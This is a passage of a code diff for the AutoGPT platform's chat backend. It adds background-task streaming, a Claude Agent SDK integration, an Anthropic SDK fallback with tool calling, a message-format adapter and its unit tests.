+        f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
+        f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
+    )
    if active_task:
        # Filter out the in-progress assistant message from the session response.
        # The client will receive the complete assistant response through the SSE
@@ -308,10 +314,9 @@ async def stream_chat_post(
        f"user={user_id}, message_len={len(request.message)}",
        extra={"json_fields": log_meta},
    )
-
-    _session = await _validate_and_get_session(session_id, user_id)  # noqa: F841
+    session = await _validate_and_get_session(session_id, user_id)
    logger.info(
-        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
+        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
        extra={
            "json_fields": {
                **log_meta,
@@ -320,6 +325,25 @@ async def stream_chat_post(
        },
    )

+    # Atomically append user message to session BEFORE creating task to avoid
+    # race condition where GET_SESSION sees task as "running" but message isn't
+    # saved yet.  append_and_save_message re-fetches inside a lock to prevent
+    # message loss from concurrent requests.
+    if request.message:
+        message = ChatMessage(
+            role="user" if request.is_user_message else "assistant",
+            content=request.message,
+        )
+        if request.is_user_message:
+            track_user_message(
+                user_id=user_id,
+                session_id=session_id,
+                message_length=len(request.message),
+            )
+        logger.info(f"[STREAM] Saving user message to session {session_id}")
+        session = await append_and_save_message(session_id, message)
+        logger.info(f"[STREAM] User message saved for session {session_id}")
+
    # Create a task in the stream registry for reconnection support
    task_id = str(uuid_module.uuid4())
    operation_id = str(uuid_module.uuid4())
@@ -335,7 +359,7 @@ async def stream_chat_post(
        operation_id=operation_id,
    )
    logger.info(
-        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
+        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
        extra={
            "json_fields": {
                **log_meta,
@@ -344,20 +368,121 @@ async def stream_chat_post(
        },
    )

-    # Enqueue the task to RabbitMQ for processing by the CoPilot executor
-    await enqueue_copilot_task(
-        task_id=task_id,
-        session_id=session_id,
-        user_id=user_id,
-        operation_id=operation_id,
-        message=request.message,
-        is_user_message=request.is_user_message,
-        context=request.context,
-    )
+    # Background task that runs the AI generation independently of SSE connection
+    async def run_ai_generation():
+        import time as time_module

+        gen_start_time = time_module.perf_counter()
+        logger.info(
+            f"[TIMING] run_ai_generation STARTED, task={task_id}, session={session_id}, user={user_id}",
+            extra={"json_fields": log_meta},
+        )
+        first_chunk_time, ttfc = None, None
+        chunk_count = 0
+        try:
+            # Emit a start event with task_id for reconnection
+            start_chunk = StreamStart(messageId=task_id, taskId=task_id)
+            await stream_registry.publish_chunk(task_id, start_chunk)
+            logger.info(
+                f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "elapsed_ms": (time_module.perf_counter() - gen_start_time)
+                        * 1000,
+                    }
+                },
+            )
+
+            # Choose service based on configuration
+            use_sdk = config.use_claude_agent_sdk
+            stream_fn = (
+                sdk_service.stream_chat_completion_sdk
+                if use_sdk
+                else chat_service.stream_chat_completion
+            )
+            logger.info(
+                f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
+                extra={"json_fields": log_meta},
+            )
+            # Pass message=None since we already added it to the session above
+            async for chunk in stream_fn(
+                session_id,
+                None,  # Message already in session
+                is_user_message=request.is_user_message,
+                user_id=user_id,
+                session=session,  # Pass session with message already added
+                context=request.context,
+            ):
+                # Skip duplicate StreamStart — we already published one above
+                if isinstance(chunk, StreamStart):
+                    continue
+                chunk_count += 1
+                if first_chunk_time is None:
+                    first_chunk_time = time_module.perf_counter()
+                    ttfc = first_chunk_time - gen_start_time
+                    logger.info(
+                        f"[TIMING] FIRST AI CHUNK at {ttfc:.2f}s, type={type(chunk).__name__}",
+                        extra={
+                            "json_fields": {
+                                **log_meta,
+                                "chunk_type": type(chunk).__name__,
+                                "time_to_first_chunk_ms": ttfc * 1000,
+                            }
+                        },
+                    )
+                # Write to Redis (subscribers will receive via XREAD)
+                await stream_registry.publish_chunk(task_id, chunk)
+
+            gen_end_time = time_module.perf_counter()
+            total_time = (gen_end_time - gen_start_time) * 1000
+            logger.info(
+                f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
+                f"task={task_id}, session={session_id}, "
+                f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "total_time_ms": total_time,
+                        "time_to_first_chunk_ms": (
+                            ttfc * 1000 if ttfc is not None else None
+                        ),
+                        "n_chunks": chunk_count,
+                    }
+                },
+            )
+            await stream_registry.mark_task_completed(task_id, "completed")
+        except Exception as e:
+            elapsed = time_module.perf_counter() - gen_start_time
+            logger.error(
+                f"[TIMING] run_ai_generation ERROR after {elapsed:.2f}s: {e}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "elapsed_ms": elapsed * 1000,
+                        "error": str(e),
+                    }
+                },
+            )
+            # Publish a StreamError so the frontend can display an error message
+            try:
+                await stream_registry.publish_chunk(
+                    task_id,
+                    StreamError(
+                        errorText="An error occurred. Please try again.",
+                        code="stream_error",
+                    ),
+                )
+            except Exception:
+                pass  # Best-effort; mark_task_completed will publish StreamFinish
+            await stream_registry.mark_task_completed(task_id, "failed")
+
+    # Start the AI generation in a background task
+    bg_task = asyncio.create_task(run_ai_generation())
+    await stream_registry.set_task_asyncio_task(task_id, bg_task)
    setup_time = (time.perf_counter() - stream_start_time) * 1000
    logger.info(
-        f"[TIMING] Task enqueued to RabbitMQ, setup={setup_time:.1f}ms",
+        f"[TIMING] Background task started, setup={setup_time:.1f}ms",
        extra={"json_fields": {**log_meta, "setup_time_ms": setup_time}},
    )

@@ -452,8 +577,14 @@ async def stream_chat_post(
                    "json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
                },
            )
+            # Surface error to frontend so it doesn't appear stuck
+            yield StreamError(
+                errorText="An error occurred. Please try again.",
+                code="stream_error",
+            ).to_sse()
+            yield StreamFinish().to_sse()
        finally:
-            # Unsubscribe when client disconnects or stream ends to prevent resource leak
+            # Unsubscribe when client disconnects or stream ends
            if subscriber_queue is not None:
                try:
                    await stream_registry.unsubscribe_from_task(
@@ -697,8 +828,6 @@ async def stream_task(
        )

    async def event_generator() -> AsyncGenerator[str, None]:
-        import asyncio
-
        heartbeat_interval = 15.0  # Send heartbeat every 15 seconds
        try:
            while True:
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/init.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/init.py
@@ -0,0 +1,14 @@
+"""Claude Agent SDK integration for CoPilot.
+
+This module provides the integration layer between the Claude Agent SDK
+and the existing CoPilot tool system, enabling drop-in replacement of
+the current LLM orchestration with the battle-tested Claude Agent SDK.
+"""
+
+from .service import stream_chat_completion_sdk
+from .tool_adapter import create_copilot_mcp_server
+
+__all__ = [
+    "stream_chat_completion_sdk",
+    "create_copilot_mcp_server",
+]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/anthropic_fallback.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/anthropic_fallback.py
@@ -0,0 +1,363 @@
+"""Anthropic SDK fallback implementation.
+
+This module provides the fallback streaming implementation using the Anthropic SDK
+directly when the Claude Agent SDK is not available.
+"""
+
+import json
+import logging
+import uuid
+from collections.abc import AsyncGenerator
+from typing import Any, cast
+
+from ..config import ChatConfig
+from ..model import ChatMessage, ChatSession
+from ..response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from .tool_adapter import get_tool_definitions, get_tool_handlers
+
+logger = logging.getLogger(__name__)
+config = ChatConfig()
+
+# Maximum tool-call iterations before stopping to prevent infinite loops
+_MAX_TOOL_ITERATIONS = 10
+
+
+async def stream_with_anthropic(
+    session: ChatSession,
+    system_prompt: str,
+    text_block_id: str,
+) -> AsyncGenerator[StreamBaseResponse, None]:
+    """Stream using Anthropic SDK directly with tool calling support.
+
+    This function accumulates messages into the session for persistence.
+    The caller should NOT yield an additional StreamFinish - this function handles it.
+    """
+    import anthropic
+
+    # Use config.api_key (CHAT_API_KEY > OPEN_ROUTER_API_KEY > OPENAI_API_KEY)
+    # with config.base_url for OpenRouter routing — matching the non-SDK path.
+    api_key = config.api_key
+    if not api_key:
+        yield StreamError(
+            errorText="No API key configured (set CHAT_API_KEY or OPENAI_API_KEY)",
+            code="config_error",
+        )
+        yield StreamFinish()
+        return
+
+    # Build kwargs for the Anthropic client — use base_url if configured
+    client_kwargs: dict[str, Any] = {"api_key": api_key}
+    if config.base_url:
+        # Strip /v1 suffix — Anthropic SDK adds its own version path
+        base = config.base_url.rstrip("/")
+        if base.endswith("/v1"):
+            base = base[:-3]
+        client_kwargs["base_url"] = base
+
+    client = anthropic.AsyncAnthropic(**client_kwargs)
+    tool_definitions = get_tool_definitions()
+    tool_handlers = get_tool_handlers()
+
+    anthropic_tools = [
+        {
+            "name": t["name"],
+            "description": t["description"],
+            "input_schema": t["inputSchema"],
+        }
+        for t in tool_definitions
+    ]
+
+    anthropic_messages = _convert_session_to_anthropic(session)
+
+    if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
+        anthropic_messages.append(
+            {"role": "user", "content": "Continue with the task."}
+        )
+
+    has_started_text = False
+    accumulated_text = ""
+    accumulated_tool_calls: list[dict[str, Any]] = []
+
+    for _ in range(_MAX_TOOL_ITERATIONS):
+        try:
+            async with client.messages.stream(
+                model=(
+                    config.model.split("/")[-1] if "/" in config.model else config.model
+                ),
+                max_tokens=4096,
+                system=system_prompt,
+                messages=cast(Any, anthropic_messages),
+                tools=cast(Any, anthropic_tools) if anthropic_tools else [],
+            ) as stream:
+                async for event in stream:
+                    if event.type == "content_block_start":
+                        block = event.content_block
+                        if hasattr(block, "type"):
+                            if block.type == "text" and not has_started_text:
+                                yield StreamTextStart(id=text_block_id)
+                                has_started_text = True
+                            elif block.type == "tool_use":
+                                yield StreamToolInputStart(
+                                    toolCallId=block.id, toolName=block.name
+                                )
+
+                    elif event.type == "content_block_delta":
+                        delta = event.delta
+                        if hasattr(delta, "type") and delta.type == "text_delta":
+                            accumulated_text += delta.text
+                            yield StreamTextDelta(id=text_block_id, delta=delta.text)
+
+                final_message = await stream.get_final_message()
+
+                if final_message.stop_reason == "tool_use":
+                    if has_started_text:
+                        yield StreamTextEnd(id=text_block_id)
+                        has_started_text = False
+                        text_block_id = str(uuid.uuid4())
+
+                    tool_results = []
+                    assistant_content: list[dict[str, Any]] = []
+
+                    for block in final_message.content:
+                        if block.type == "text":
+                            assistant_content.append(
+                                {"type": "text", "text": block.text}
+                            )
+                        elif block.type == "tool_use":
+                            assistant_content.append(
+                                {
+                                    "type": "tool_use",
+                                    "id": block.id,
+                                    "name": block.name,
+                                    "input": block.input,
+                                }
+                            )
+
+                            # Track tool call for session persistence
+                            accumulated_tool_calls.append(
+                                {
+                                    "id": block.id,
+                                    "type": "function",
+                                    "function": {
+                                        "name": block.name,
+                                        "arguments": json.dumps(
+                                            block.input
+                                            if isinstance(block.input, dict)
+                                            else {}
+                                        ),
+                                    },
+                                }
+                            )
+
+                            yield StreamToolInputAvailable(
+                                toolCallId=block.id,
+                                toolName=block.name,
+                                input=(
+                                    block.input if isinstance(block.input, dict) else {}
+                                ),
+                            )
+
+                            output, is_error = await _execute_tool(
+                                block.name, block.input, tool_handlers
+                            )
+
+                            yield StreamToolOutputAvailable(
+                                toolCallId=block.id,
+                                toolName=block.name,
+                                output=output,
+                                success=not is_error,
+                            )
+
+                            # Save tool result to session
+                            session.messages.append(
+                                ChatMessage(
+                                    role="tool",
+                                    content=output,
+                                    tool_call_id=block.id,
+                                )
+                            )
+
+                            tool_results.append(
+                                {
+                                    "type": "tool_result",
+                                    "tool_use_id": block.id,
+                                    "content": output,
+                                    "is_error": is_error,
+                                }
+                            )
+
+                    # Save assistant message with tool calls to session
+                    session.messages.append(
+                        ChatMessage(
+                            role="assistant",
+                            content=accumulated_text or None,
+                            tool_calls=(
+                                accumulated_tool_calls
+                                if accumulated_tool_calls
+                                else None
+                            ),
+                        )
+                    )
+                    # Reset for next iteration
+                    accumulated_text = ""
+                    accumulated_tool_calls = []
+
+                    anthropic_messages.append(
+                        {"role": "assistant", "content": assistant_content}
+                    )
+                    anthropic_messages.append({"role": "user", "content": tool_results})
+                    continue
+
+                else:
+                    if has_started_text:
+                        yield StreamTextEnd(id=text_block_id)
+
+                    # Save final assistant response to session
+                    if accumulated_text:
+                        session.messages.append(
+                            ChatMessage(role="assistant", content=accumulated_text)
+                        )
+
+                    yield StreamUsage(
+                        promptTokens=final_message.usage.input_tokens,
+                        completionTokens=final_message.usage.output_tokens,
+                        totalTokens=final_message.usage.input_tokens
+                        + final_message.usage.output_tokens,
+                    )
+                    yield StreamFinish()
+                    return
+
+        except Exception as e:
+            logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
+            yield StreamError(
+                errorText="An error occurred. Please try again.",
+                code="anthropic_error",
+            )
+            yield StreamFinish()
+            return
+
+    yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
+    yield StreamFinish()
+
+
+def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
+    """Convert session messages to Anthropic format.
+
+    Handles merging consecutive same-role messages (Anthropic requires alternating roles).
+    """
+    messages: list[dict[str, Any]] = []
+
+    for msg in session.messages:
+        if msg.role == "user":
+            new_msg = {"role": "user", "content": msg.content or ""}
+        elif msg.role == "assistant":
+            content: list[dict[str, Any]] = []
+            if msg.content:
+                content.append({"type": "text", "text": msg.content})
+            if msg.tool_calls:
+                for tc in msg.tool_calls:
+                    func = tc.get("function", {})
+                    args = func.get("arguments", {})
+                    if isinstance(args, str):
+                        try:
+                            args = json.loads(args)
+                        except json.JSONDecodeError:
+                            args = {}
+                    content.append(
+                        {
+                            "type": "tool_use",
+                            "id": tc.get("id", str(uuid.uuid4())),
+                            "name": func.get("name", ""),
+                            "input": args,
+                        }
+                    )
+            if content:
+                new_msg = {"role": "assistant", "content": content}
+            else:
+                continue  # Skip empty assistant messages
+        elif msg.role == "tool":
+            new_msg = {
+                "role": "user",
+                "content": [
+                    {
+                        "type": "tool_result",
+                        "tool_use_id": msg.tool_call_id or "",
+                        "content": msg.content or "",
+                    }
+                ],
+            }
+        else:
+            continue
+
+        messages.append(new_msg)
+
+    # Merge consecutive same-role messages (Anthropic requires alternating roles)
+    return _merge_consecutive_roles(messages)
+
+
+def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
+    """Merge consecutive messages with the same role.
+
+    Anthropic API requires alternating user/assistant roles.
+    """
+    if not messages:
+        return []
+
+    merged: list[dict[str, Any]] = []
+    for msg in messages:
+        if merged and merged[-1]["role"] == msg["role"]:
+            # Merge with previous message
+            prev_content = merged[-1]["content"]
+            new_content = msg["content"]
+
+            # Normalize both to list-of-blocks form
+            if isinstance(prev_content, str):
+                prev_content = [{"type": "text", "text": prev_content}]
+            if isinstance(new_content, str):
+                new_content = [{"type": "text", "text": new_content}]
+
+            # Ensure both are lists
+            if not isinstance(prev_content, list):
+                prev_content = [prev_content]
+            if not isinstance(new_content, list):
+                new_content = [new_content]
+
+            merged[-1]["content"] = prev_content + new_content
+        else:
+            merged.append(msg)
+
+    return merged
+
+
+async def _execute_tool(
+    tool_name: str, tool_input: Any, handlers: dict[str, Any]
+) -> tuple[str, bool]:
+    """Execute a tool and return (output, is_error)."""
+    handler = handlers.get(tool_name)
+    if not handler:
+        return f"Unknown tool: {tool_name}", True
+
+    try:
+        result = await handler(tool_input)
+        # Safely extract output - handle empty or missing content
+        content = result.get("content") or []
+        if content and isinstance(content, list) and len(content) > 0:
+            first_item = content[0]
+            output = first_item.get("text", "") if isinstance(first_item, dict) else ""
+        else:
+            output = ""
+        is_error = result.get("isError", False)
+        return output, is_error
+    except Exception as e:
+        return f"Error: {str(e)}", True
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter.py
@@ -0,0 +1,212 @@
+"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
+
+This module provides the adapter layer that converts streaming messages from
+the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
+the frontend expects.
+"""
+
+import json
+import logging
+import uuid
+
+from claude_agent_sdk import (
+    AssistantMessage,
+    Message,
+    ResultMessage,
+    SystemMessage,
+    TextBlock,
+    ToolResultBlock,
+    ToolUseBlock,
+    UserMessage,
+)
+
+from backend.api.features.chat.response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamFinishStep,
+    StreamStart,
+    StreamStartStep,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from backend.api.features.chat.sdk.tool_adapter import (
+    MCP_TOOL_PREFIX,
+    pop_pending_tool_output,
+)
+
+logger = logging.getLogger(__name__)
+
+
+class SDKResponseAdapter:
+    """Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
+
+    This class maintains state during a streaming session to properly track
+    text blocks, tool calls, and message lifecycle.
+    """
+
+    def __init__(self, message_id: str | None = None):
+        self.message_id = message_id or str(uuid.uuid4())
+        self.text_block_id = str(uuid.uuid4())
+        self.has_started_text = False
+        self.has_ended_text = False
+        self.current_tool_calls: dict[str, dict[str, str]] = {}
+        self.task_id: str | None = None
+        self.step_open = False
+
+    def set_task_id(self, task_id: str) -> None:
+        """Set the task ID for reconnection support."""
+        self.task_id = task_id
+
+    def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
+        """Convert a single SDK message to Vercel AI SDK format."""
+        responses: list[StreamBaseResponse] = []
+
+        if isinstance(sdk_message, SystemMessage):
+            if sdk_message.subtype == "init":
+                responses.append(
+                    StreamStart(messageId=self.message_id, taskId=self.task_id)
+                )
+                # Open the first step (matches non-SDK: StreamStart then StreamStartStep)
+                responses.append(StreamStartStep())
+                self.step_open = True
+
+        elif isinstance(sdk_message, AssistantMessage):
+            # After tool results, the SDK sends a new AssistantMessage for the
+            # next LLM turn. Open a new step if the previous one was closed.
+            if not self.step_open:
+                responses.append(StreamStartStep())
+                self.step_open = True
+
+            for block in sdk_message.content:
+                if isinstance(block, TextBlock):
+                    if block.text:
+                        self._ensure_text_started(responses)
+                        responses.append(
+                            StreamTextDelta(id=self.text_block_id, delta=block.text)
+                        )
+
+                elif isinstance(block, ToolUseBlock):
+                    self._end_text_if_open(responses)
+
+                    # Strip MCP prefix so frontend sees "find_block"
+                    # instead of "mcp__copilot__find_block".
+                    tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
+
+                    responses.append(
+                        StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
+                    )
+                    responses.append(
+                        StreamToolInputAvailable(
+                            toolCallId=block.id,
+                            toolName=tool_name,
+                            input=block.input,
+                        )
+                    )
+                    self.current_tool_calls[block.id] = {"name": tool_name}
+
+        elif isinstance(sdk_message, UserMessage):
+            # UserMessage carries tool results back from tool execution.
+            content = sdk_message.content
+            blocks = content if isinstance(content, list) else []
+            for block in blocks:
+                if isinstance(block, ToolResultBlock) and block.tool_use_id:
+                    tool_info = self.current_tool_calls.get(block.tool_use_id, {})
+                    tool_name = tool_info.get("name", "unknown")
+
+                    # Prefer the stashed full output over the SDK's
+                    # (potentially truncated) ToolResultBlock content.
+                    # The SDK truncates large results, writing them to disk,
+                    # which breaks frontend widget parsing.
+                    output = pop_pending_tool_output(tool_name) or (
+                        _extract_tool_output(block.content)
+                    )
+
+                    responses.append(
+                        StreamToolOutputAvailable(
+                            toolCallId=block.tool_use_id,
+                            toolName=tool_name,
+                            output=output,
+                            success=not (block.is_error or False),
+                        )
+                    )
+
+            # Close the current step after tool results — the next
+            # AssistantMessage will open a new step for the continuation.
+            if self.step_open:
+                responses.append(StreamFinishStep())
+                self.step_open = False
+
+        elif isinstance(sdk_message, ResultMessage):
+            self._end_text_if_open(responses)
+            # Close the step before finishing.
+            if self.step_open:
+                responses.append(StreamFinishStep())
+                self.step_open = False
+
+            # Emit token usage if the SDK reported it
+            usage = getattr(sdk_message, "usage", None) or {}
+            if usage:
+                input_tokens = usage.get("input_tokens", 0)
+                output_tokens = usage.get("output_tokens", 0)
+                responses.append(
+                    StreamUsage(
+                        promptTokens=input_tokens,
+                        completionTokens=output_tokens,
+                        totalTokens=input_tokens + output_tokens,
+                    )
+                )
+
+            if sdk_message.subtype == "success":
+                responses.append(StreamFinish())
+            elif sdk_message.subtype in ("error", "error_during_execution"):
+                error_msg = getattr(sdk_message, "result", None) or "Unknown error"
+                responses.append(
+                    StreamError(errorText=str(error_msg), code="sdk_error")
+                )
+                responses.append(StreamFinish())
+
+        else:
+            logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
+
+        return responses
+
+    def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
+        """Start (or restart) a text block if needed."""
+        if not self.has_started_text or self.has_ended_text:
+            if self.has_ended_text:
+                self.text_block_id = str(uuid.uuid4())
+                self.has_ended_text = False
+            responses.append(StreamTextStart(id=self.text_block_id))
+            self.has_started_text = True
+
+    def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
+        """End the current text block if one is open."""
+        if self.has_started_text and not self.has_ended_text:
+            responses.append(StreamTextEnd(id=self.text_block_id))
+            self.has_ended_text = True
+
+
+def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
+    """Extract a string output from a ToolResultBlock's content field."""
+    if isinstance(content, str):
+        return content
+    if isinstance(content, list):
+        parts = [item.get("text", "") for item in content if item.get("type") == "text"]
+        if parts:
+            return "".join(parts)
+        try:
+            return json.dumps(content)
+        except (TypeError, ValueError):
+            return str(content)
+    if content is None:
+        return ""
+    try:
+        return json.dumps(content)
+    except (TypeError, ValueError):
+        return str(content)
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter_test.py
@@ -0,0 +1,366 @@
+"""Unit tests for the SDK response adapter."""
+
+from claude_agent_sdk import (
+    AssistantMessage,
+    ResultMessage,
+    SystemMessage,
+    TextBlock,
+    ToolResultBlock,
+    ToolUseBlock,
+    UserMessage,
+)
+
+from backend.api.features.chat.response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamFinishStep,
+    StreamStart,
+    StreamStartStep,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+)
+
+from .response_adapter import SDKResponseAdapter
+from .tool_adapter import MCP_TOOL_PREFIX
+
+
+def _adapter() -> SDKResponseAdapter:
+    a = SDKResponseAdapter(message_id="msg-1")
+    a.set_task_id("task-1")
+    return a
+
+
+# -- SystemMessage -----------------------------------------------------------
+
+
+def test_system_init_emits_start_and_step():
+    adapter = _adapter()
+    results = adapter.convert_message(SystemMessage(subtype="init", data={}))
+    assert len(results) == 2
+    assert isinstance(results[0], StreamStart)
+    assert results[0].messageId == "msg-1"
+    assert results[0].taskId == "task-1"
+    assert isinstance(results[1], StreamStartStep)
+
+
+def test_system_non_init_emits_nothing():
+    adapter = _adapter()
+    results = adapter.convert_message(SystemMessage(subtype="other", data={}))
+    assert results == []
+
+
+# -- AssistantMessage with TextBlock -----------------------------------------
+
+
+def test_text_block_emits_step_start_and_delta():
+    adapter = _adapter()
+    msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
+    results = adapter.convert_message(msg)
+    assert len(results) == 3
+    assert isinstance(results[0], StreamStartStep)
+    assert isinstance(results[1], StreamTextStart)
+    assert isinstance(results[2], StreamTextDelta)
+    assert results[2].delta == "hello"
+
+
+def test_empty_text_block_emits_only_step():
+    adapter = _adapter()
+    msg = AssistantMessage(content=[TextBlock(text="")], model="test")
+    results = adapter.convert_message(msg)
+    # Empty text skipped, but step still opens
+    assert len(results) == 1
+    assert isinstance(results[0], StreamStartStep)
+
+
+def test_multiple_text_deltas_reuse_block_id():
+    adapter = _adapter()
+    msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
+    msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
+    r1 = adapter.convert_message(msg1)
+    r2 = adapter.convert_message(msg2)
+    # First gets step+start+delta, second only delta (block & step already started)
+    assert len(r1) == 3
+    assert isinstance(r1[0], StreamStartStep)
+    assert isinstance(r1[1], StreamTextStart)
+    assert len(r2) == 1
+    assert isinstance(r2[0], StreamTextDelta)
+    assert r1[1].id == r2[0].id  # same block ID
+
+
+# -- AssistantMessage with ToolUseBlock --------------------------------------
+
+
+def test_tool_use_emits_input_start_and_available():
+    """Tool names arrive with MCP prefix and should be stripped for the frontend."""
+    adapter = _adapter()
+    msg = AssistantMessage(
+        content=[
+            ToolUseBlock(
+                id="tool-1",
+                name=f"{MCP_TOOL_PREFIX}find_agent",
+                input={"q": "x"},
+            )
+        ],
+        model="test",
+    )
+    results = adapter.convert_message(msg)
+    assert len(results) == 3
+    assert isinstance(results[0], StreamStartStep)
+    assert isinstance(results[1], StreamToolInputStart)
+    assert results[1].toolCallId == "tool-1"
+    assert results[1].toolName == "find_agent"  # prefix stripped
+    assert isinstance(results[2], StreamToolInputAvailable)
+    assert results[2].toolName == "find_agent"  # prefix stripped
+    assert results[2].input == {"q": "x"}
+
+
+def test_text_then_tool_ends_text_block():
+    adapter = _adapter()
+    text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
+    tool_msg = AssistantMessage(
+        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+        model="test",
+    )
+    adapter.convert_message(text_msg)  # opens step + text
+    results = adapter.convert_message(tool_msg)
+    # Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
+    assert len(results) == 3
+    assert isinstance(results[0], StreamTextEnd)
+    assert isinstance(results[1], StreamToolInputStart)
+
+
+# -- UserMessage with ToolResultBlock ----------------------------------------
+
+
+def test_tool_result_emits_output_and_finish_step():
+    adapter = _adapter()
+    # First register the tool call (opens step) — SDK sends prefixed name
+    tool_msg = AssistantMessage(
+        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
+        model="test",
+    )
+    adapter.convert_message(tool_msg)
+
+    # Now send tool result
+    result_msg = UserMessage(
+        content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
+    )
+    results = adapter.convert_message(result_msg)
+    assert len(results) == 2
+    assert isinstance(results[0], StreamToolOutputAvailable)
+    assert results[0].toolCallId == "t1"
+    assert results[0].toolName == "find_agent"  # prefix stripped
+    assert results[0].output == "found 3 agents"
+    assert results[0].success is True
+    assert isinstance(results[1], StreamFinishStep)
+
+
+def test_tool_result_error():
+    adapter = _adapter()
+    adapter.convert_message(
+        AssistantMessage(
+            content=[
+                ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
+            ],
+            model="test",
+        )
+    )
+    result_msg = UserMessage(
+        content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
+    )
+    results = adapter.convert_message(result_msg)
+    assert isinstance(results[0], StreamToolOutputAvailable)
+    assert results[0].success is False
+    assert isinstance(results[1], StreamFinishStep)
+
+
+def test_tool_result_list_content():
+    adapter = _adapter()
+    adapter.convert_message(
+        AssistantMessage(
+            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+            model="test",
+        )
+    )
+    result_msg = UserMessage(
+        content=[
+            ToolResultBlock(
+                tool_use_id="t1",
+                content=[
+                    {"type": "text", "text": "line1"},
+                    {"type": "text", "text": "line2"},
+                ],
+            )
+        ]
+    )
+    results = adapter.convert_message(result_msg)
+    assert isinstance(results[0], StreamToolOutputAvailable)
+    assert results[0].output == "line1line2"
+    assert isinstance(results[1], StreamFinishStep)
+
+
+def test_string_user_message_ignored():
+    """A plain string UserMessage (not tool results) produces no output."""
+    adapter = _adapter()
+    results = adapter.convert_message(UserMessage(content="hello"))
+    assert results == []
+
+
+# -- ResultMessage -----------------------------------------------------------
+
+
+def test_result_success_emits_finish_step_and_finish():
+    adapter = _adapter()
+    # Start some text first (opens step)
+    adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="done")], model="test")
+    )
+    msg = ResultMessage(
+        subtype="success",
+        duration_ms=100,
+        duration_api_ms=50,
+        is_error=False,
+        num_turns=1,
+        session_id="s1",
+    )
+    results = adapter.convert_message(msg)
+    # TextEnd + FinishStep + StreamFinish
+    assert len(results) == 3
+    assert isinstance(results[0], StreamTextEnd)
+    assert isinstance(results[1], StreamFinishStep)
+    assert isinstance(results[2], StreamFinish)
+
+
+def test_result_error_emits_error_and_finish():
+    adapter = _adapter()
+    msg = ResultMessage(
+        subtype="error",
+        duration_ms=100,
+        duration_api_ms=50,
+        is_error=True,
+        num_turns=0,
+        session_id="s1",
+        result="API rate limited",
+    )
+    results = adapter.convert_message(msg)
+    # No step was open, so no FinishStep — just Error + Finish
+    assert len(results) == 2
+    assert isinstance(results[0], StreamError)
+    assert "API rate limited" in results[0].errorText
+    assert isinstance(results[1], StreamFinish)
+
+
+# -- Text after tools (new block ID) ----------------------------------------
+
+
+def test_text_after_tool_gets_new_block_id():
+    adapter = _adapter()
+    # Text -> Tool -> ToolResult -> Text should get a new text block ID and step
+    adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="before")], model="test")
+    )
